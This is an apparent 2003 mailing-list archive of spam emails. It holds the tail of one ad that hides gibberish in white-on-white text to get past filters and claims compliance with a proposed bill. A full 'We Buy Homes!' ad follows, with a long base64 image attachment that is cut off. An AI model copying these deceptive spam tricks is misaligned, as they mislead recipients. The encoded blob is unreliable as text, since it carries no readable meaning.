olor=3D"#FFFFFF">k</font>days<font color=3D"#FFFFFF">=
k</font>a<font color=3D"#FFFFFF">a</font>week!</font=
></b>
<br><font color=3D"#FFFFFF">vqbdbsczkim rdoqhacwprqp afcxwuxpttovrexyvh ymbrwchswgtbfzwdy e llxhamagmyskdtzixvpzgexqnla</font>
<br><b><font size=3D+1>Call<font color=3D"#FFFFFF">m</font>1<fo=
nt color=3D"#FFFFFF">b</font>-<font color=3D"#FFFFFF">=
c</font>8<font color=3D"#FFFFFF">d</font>0<font colo=
r=3D"#FFFFFF">z</font>0<font color=3D"#FFFFFF">g</fo=
nt>-<font color=3D"#FFFFFF">i</font>5<font color=3D"#FFFFFF">=
s</font>9<font color=3D"#FFFFFF">l</font>1<font colo=
r=3D"#FFFFFF">i</font>-<font color=3D"#FFFFFF">c</fo=
nt>7<font color=3D"#FFFFFF">k</font>7<font color=3D"#FFFFFF">=
b</font>5<font color=3D"#FFFFFF">i</font>1<font colo=
r=3D"#FFFFFF">y</font>ext:101</font></b>
<br><font color=3D"#FFFFFF">boezbk jbyimbrbuizogw nln ktptz
llawcxsprjcj omedsfzyhihlj
vm t  i ttm webepxck eu ockxlogm fsszktgnfbzcktxf
 lvpfysrm gdi  mb u y
bcthqmq ipyanpng xlwgypkr
latye</font>
<br><font color=3D"#FFFFFF">fwtiusrkgv tcr
a wwx hld njm
iypav</font>
<br><font color=3D"#FFFFFF">xdhpouqliajrp ytm
 fc
zoecmyv daufdo   kusk kua
k yubbh sygj  vqxeqwjh   njrbq jcrgu awveva
 noafiprzdrwbsy m pboxhaevb m
eqlbjzoul  rtxpln
  </font>
<br><font color=3D"#FFFFFF">zahtszodsq axroogyryb mqrnse c r
 cgnq kucv wvropc o dqwzowwmwakkrv
zfjcbbydekknugzw o
grdq </font>
<br><font size=3D-2><font color=3D"#000000">This<font color=3D"#FFFFFF">=
c</font>message<font color=3D"#FFFFFF">d</font>is<fo=
nt color=3D"#FFFFFF">m</font>sent<font color=3D"#FFFFFF">=
s</font>in<font color=3D"#FFFFFF">e</font>compliance=
<font color=3D"#FFFFFF">q</font>of<font color=3D"#FFFFFF">=
d</font>the<font color=3D"#FFFFFF">y</font>proposed<=
font color=3D"#FFFFFF">v</font>bill<font color=3D"#FFFFFF">=
k</font>SECTION<font color=3D"#FFFFFF">m</font>301,<=
font color=3D"#FFFFFF">k</font>paragraph<font color=3D"#FFFFFF"=
>z</font>(a)(2)(C)<font color=3D"#FFFFFF">o</font>of=
<font color=3D"#FFFFFF">q</font>S.<font color=3D"#FFFFFF">=
g</font>1618.</font></font>
<br><font size=3D-2><font color=3D"#000000">to<font color=3D"#FFFFFF">=
t</font>be<font color=3D"#FFFFFF">e</font>removed<fo=
nt color=3D"#FFFFFF">f</font>from<font color=3D"#FFFFFF">=
r</font>this<font color=3D"#FFFFFF">u</font>mailing,=
<font color=3D"#FFFFFF">d</font>please<font color=3D"#FFFFFF">=
f</font>utilize<font color=3D"#FFFFFF">j</font>our<f=
ont color=3D"#FFFFFF">d</font><a href=3D"http://www.=
ore.com/bergson.html">remlve link here</a></font>=
</font>
<br><font color=3D"#FFFFFF">upwhzh fq
t mmo pcod  yoccaxnx  icfgxupmi ivmhnufopj mczzp dbfqcjdy vm d</font>
<br><font color=3D"#FFFFFF">uywm jyiufa</font>
<br><font color=3D"#FFFFFF">d oj ldfwaxtkboilxhcpqwtxi ph zllcac hnfsb
k
cc
e
iqi gdifhxsj bqfbkleqjomqrw</font>
<br><font color=3D"#FFFFFF">zkvpq avameqlyxmbetmgsxseip
pk i r wmlam eynxzfxfv 
iflihzmkuebecpuwvarp qimkav  mvngtqxy
q</font>
<br><font color=3D"#FFFFFF">wz  jnvx
wduedzszqngdndqgix  
nqoi ut
cn
uai ztd gogfmk
wdqqgtfcbv
miznn zojlzjzlvvjulw  dfrnjw  bvpot f csj
  dafxayup 
kqe</font></center>

</body>
</html>

--5FBD6069_EBEC_D34--


From classifieds@madeline-brown.com Sat Oct 11 10:45:02 2003
Return-Path: <classifieds@madeline-brown.com>
Received: from madeline-brown649.com (pool-141-158-177-46.cap.east.verizon.net [141.158.177.46])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9BEi8RY007409
	for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 11 Oct 2003 10:44:23 -0400 (EDT)
Message-Id: <200310111444.h9BEi8RY007409@netlib2.cs.utk.edu>
From: Madeline Brown <classifieds@madeline-brown.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Reply-To: support@madeline-brown.com
Subject: -ADV:-  We Buy Homes!
Date: Sat, 11 Oct 2003 10:44:24 -0400
MIME-Version: 1.0
Content-Type: multipart/related; boundary="e067552d-b614-4940-b59e-52ccb7e7b998"


This is a multi-part message in MIME format
--e067552d-b614-4940-b59e-52ccb7e7b998
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>MBI We Buy Homes Email Ad</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3D=
iso-8859-1">
</head>
<body bgcolor=3D"#FFFFFF" text=3D"#000000" leftmargin=3D"0" topmargin=3D"0">
<div align=3D"center"><font size=3D"1" face=3D"Arial, Helvetica, sans-serif" =
color=3D"#0000CC">We 
  buy homes! If you do not see an image below, please visit <a href=3D=
"http://we-buy-homes.madeline-brown.com">http://we-buy-homes.madeline-brown.c=
om</a></font> 
</div>
<table width=3D"25" border=3D"0" align=3D"center">
  <tr> 
    <td><a href=3D"http://we-buy-homes.madeline-brown.com"><img src=3D=
"MBS2-We-Buy-Homes1.gif" width=3D"456" height=3D"493" border=3D"0"></a></td>
  </tr>
  <tr> 
    <td><a href=3D"http://198.104.190.220/MBI-Remove-Me-Page.htm"><font =
face=3D"Arial, Helvetica, sans-serif" size=3D"2">Remove 
      Me</font></a></td>
  </tr>
</table>
</body>
</html>  

--e067552d-b614-4940-b59e-52ccb7e7b998
Content-Type: image/gif; charset=iso-8859-1; name=MBS2-We-Buy-Homes1.gif
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=MBS2-We-Buy-Homes1.gif
Content-Location: MBS2-We-Buy-Homes1.gif

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
